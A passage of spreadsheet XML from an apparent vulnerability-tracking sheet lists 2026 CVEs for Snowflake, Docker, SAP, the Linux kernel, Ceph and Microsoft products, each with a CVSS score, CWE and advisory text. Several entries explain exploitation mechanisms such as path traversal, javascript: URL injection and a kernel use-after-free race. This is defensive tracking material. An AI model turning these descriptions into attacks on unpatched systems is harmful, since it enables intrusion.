      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19594</t>
        </is>
      </c>
      <c r="C595" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E595" s="5" t="inlineStr"/>
      <c r="F595" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G595" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr">
        <is>
          <t>CWE-141, CWE-22</t>
        </is>
      </c>
      <c r="L595" s="5" t="inlineStr">
        <is>
          <t>Insufficient input sanitization in Snowflake Python API (`snowflake.core`) versions prior to 1.13.0 allowed confused-deputy privilege escalation through two related weaknesses: path traversal (CWE-22) via unencoded `..` identifier path segments, and HTTP parameter pollution (CWE-141) via unencoded `&amp;`/`#`/`=` characters in query string values. An attacker with access to a downstream application built on snowflake.core could exploit the path traversal by supplying `..` as an object name, causing `snowflake.core` to issue REST requests against a parent resource or exploit the parameter pollution by injecting `&amp;`/`#`/`=` into a free-form name field to override constraints on swap, clone, or rename operations — all executed under the application's privileged session. Successful exploitation requires the attacker to control an identifier or object-name string in an application built on snowflake.core that passes it to `snowflake.core` under a higher-privileged Snowflake session (e.g., an EXECUTE AS OWNER stored procedure, Streamlit app, or Native App). The fix is available in Snowflake Python API version 1.13.0, which also addresses several additional security findings. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19594</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33997</t>
        </is>
      </c>
      <c r="C596" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E596" s="5" t="inlineStr"/>
      <c r="F596" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G596" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H596" s="5" t="inlineStr">
        <is>
          <t>docker:engine</t>
        </is>
      </c>
      <c r="I596" s="5" t="inlineStr">
        <is>
          <t>2026-03-31</t>
        </is>
      </c>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-266</t>
        </is>
      </c>
      <c r="L596" s="5" t="inlineStr">
        <is>
          <t>Moby is an open source container framework. Prior to version 29.3.1, a security vulnerability has been detected that allows plugins privilege validation to be bypassed during docker plugin install. Due to an error in the daemon's privilege comparison logic, the daemon may incorrectly accept a privilege set that differs from the one approved by the user. Plugins that request exactly one privilege are also affected, because no comparison is performed at all. This issue has been patched in version 29.3.1.</t>
        </is>
      </c>
      <c r="M596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33997</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44745</t>
        </is>
      </c>
      <c r="C597" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E597" s="5" t="inlineStr"/>
      <c r="F597" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G597" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H597" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I597" s="5" t="inlineStr">
        <is>
          <t>2026-07-14</t>
        </is>
      </c>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L597" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not properly validate incoming request headers during the OAuth2 login flow under certain configurations. This allows an unauthenticated remote attacker to craft a malicious link which, when clicked by a victim, could lead to unauthorized access. Successful exploitation results in a high impact to the confidentiality and integrity with no impact on the availability of the application.</t>
        </is>
      </c>
      <c r="M597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44745</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46099</t>
        </is>
      </c>
      <c r="C598" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E598" s="5" t="inlineStr"/>
      <c r="F598" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G598" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H598" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I598" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr">
        <is>
          <t>CWE-911</t>
        </is>
      </c>
      <c r="L598" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: fix NOREF dst use in seg6 and rpl lwtunnels
seg6_input_core() and rpl_input() call ip6_route_input() which sets a
NOREF dst on the skb, then pass it to dst_cache_set_ip6() invoking
dst_hold() unconditionally.
On PREEMPT_RT, ksoftirqd is preemptible and a higher-priority task can
release the underlying pcpu_rt between the lookup and the caching
through a concurrent FIB lookup on a shared nexthop.
Simplified race sequence:
  ksoftirqd/X                       higher-prio task (same CPU X)
  -----------                       --------------------------------
  seg6_input_core(,skb)/rpl_input(skb)
    dst_cache_get()
      -&gt; miss
    ip6_route_input(skb)
      -&gt; ip6_pol_route(,skb,flags)
         [RT6_LOOKUP_F_DST_NOREF in flags]
        -&gt; FIB lookup resolves fib6_nh
           [nhid=N route]
        -&gt; rt6_make_pcpu_route()
           [creates pcpu_rt, refcount=1]
             pcpu_rt-&gt;sernum = fib6_sernum
             [fib6_sernum=W]
           -&gt; cmpxchg(fib6_nh.rt6i_pcpu,
                      NULL, pcpu_rt)
              [slot was empty, store succeeds]
      -&gt; skb_dst_set_noref(skb, dst)
         [dst is pcpu_rt, refcount still 1]
                                    rt_genid_bump_ipv6()
                                      -&gt; bumps fib6_sernum
                                         [fib6_sernum from W to Z]
                                    ip6_route_output()
                                      -&gt; ip6_pol_route()
                                        -&gt; FIB lookup resolves fib6_nh
                                           [nhid=N]
                                        -&gt; rt6_get_pcpu_route()
                                             pcpu_rt-&gt;sernum != fib6_sernum
                                             [W &lt;&gt; Z, stale]
                                          -&gt; prev = xchg(rt6i_pcpu, NULL)
                                          -&gt; dst_release(prev)
                                             [prev is pcpu_rt,
                                              refcount 1-&gt;0, dead]
    dst = skb_dst(skb)
    [dst is the dead pcpu_rt]
    dst_cache_set_ip6(dst)
      -&gt; dst_hold() on dead dst
      -&gt; WARN / use-after-free
For the race to occur, ksoftirqd must be preemptible (PREEMPT_RT without
PREEMPT_RT_NEEDS_BH_LOCK) and a concurrent task must be able to release
the pcpu_rt. Shared nexthop objects provide such a path, as two routes
pointing to the same nhid share the same fib6_nh and its rt6i_pcpu
entry.
Fix seg6_input_core() and rpl_input() by calling skb_dst_force() after
ip6_route_input() to force the NOREF dst into a refcounted one before
caching.
The output path is not affected as ip6_route_output() already returns a
refcounted dst.</t>
        </is>
      </c>
      <c r="M598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46099</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48081</t>
        </is>
      </c>
      <c r="C599" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E599" s="5" t="inlineStr"/>
      <c r="F599" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G599" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H599" s="5" t="inlineStr"/>
      <c r="I599" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L599" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, a TENANT_ADMIN can store `javascript:` URLs in the tenant `links` configuration (`website`, `imprint`, `privacyStatement`). These values are returned to the patient-facing landing page via `/api/public`, hydrated into the SvelteKit Button component, and rendered as `&lt;a href="javascript:..."&gt;` elements without URL-scheme filtering. A patient who clicks any such link executes the attacker's JavaScript inside the patient browser origin, where patient form data is read before client-side encryption is applied. This breaks the project's central trust claim that the server is an untrusted relay and that administrators cannot read patient data. Patient-side encryption happens after form input, so JavaScript executing in the patient origin can read or alter the plaintext before encryption is performed. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48081</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54330</t>
        </is>
      </c>
      <c r="C600" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E600" s="5" t="inlineStr"/>
      <c r="F600" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G600" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H600" s="5" t="inlineStr"/>
      <c r="I600" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L600" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the Ceph Object Gateway (RGW) SigV4 handler does not reject requests that carry x-amz-* headers absent from the signed header set, allowing anyone holding a presigned URL to attach arbitrary unsigned x-amz-* headers that RGW will honor. AWS S3 requires every x-amz-* header on a SigV4 request to be signed and rejects requests bearing additional unsigned headers, but RGW validates only the headers listed in X-Amz-SignedHeaders and ignores any extra ones, so they take effect without being covered by the signature. By adding such headers to a presigned PUT URL, an attacker can grant themselves more capabilities than the URL's signer intended and escalate their privileges. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54330</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55007</t>
        </is>
      </c>
      <c r="C601" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E601" s="5" t="inlineStr"/>
      <c r="F601" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G601" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L601" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65181</t>
        </is>
      </c>
      <c r="C602" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E602" s="5" t="inlineStr"/>
      <c r="F602" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G602" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H602" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I602" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L602" s="5" t="inlineStr">
        <is>
          <t>Insufficient authorization of Data Source tables in Impala 2.7-4.5 allows a client with privileges to upload a file to remote storage and create a table to execute arbitrary Java code.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65181</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69325</t>
        </is>
      </c>
      <c r="C603" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E603" s="5" t="inlineStr"/>
      <c r="F603" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G603" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L603" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69380</t>
        </is>
      </c>
      <c r="C604" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E604" s="5" t="inlineStr"/>
      <c r="F604" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G604" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H604" s="5" t="inlineStr"/>
      <c r="I604" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L604" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="C605" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E605" s="5" t="inlineStr"/>
      <c r="F605" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G605" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H605" s="5" t="inlineStr"/>
      <c r="I605" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="L605" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="C606" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E606" s="5" t="inlineStr"/>
      <c r="F606" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G606" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H606" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I606" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L606" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69524</t>
        </is>
      </c>
      <c r="C607" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E607" s="5" t="inlineStr"/>
      <c r="F607" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G607" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H607" s="5" t="inlineStr"/>
      <c r="I607" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L607" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69546</t>
        </is>
      </c>
      <c r="C608" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E608" s="5" t="inlineStr"/>
      <c r="F608" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G608" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H608" s="5" t="inlineStr"/>
      <c r="I608" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L608" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="C609" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E609" s="5" t="inlineStr"/>
      <c r="F609" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G609" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H609" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I609" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L609" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69680</t>
        </is>
      </c>
      <c r="C610" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E610" s="5" t="inlineStr"/>
      <c r="F610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G610" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H610" s="5" t="inlineStr"/>
      <c r="I610" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L610" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69732</t>
        </is>
      </c>
      <c r="C611" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G611" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L611" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69786</t>
        </is>
      </c>
      <c r="C612" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G612" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H612" s="5" t="inlineStr"/>
      <c r="I612" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L612" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="C613" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G613" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H613" s="5" t="inlineStr"/>
      <c r="I613" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L613" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="C614" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G614" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L614" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="C615" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G615" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L615" s="5" t="inlineStr">
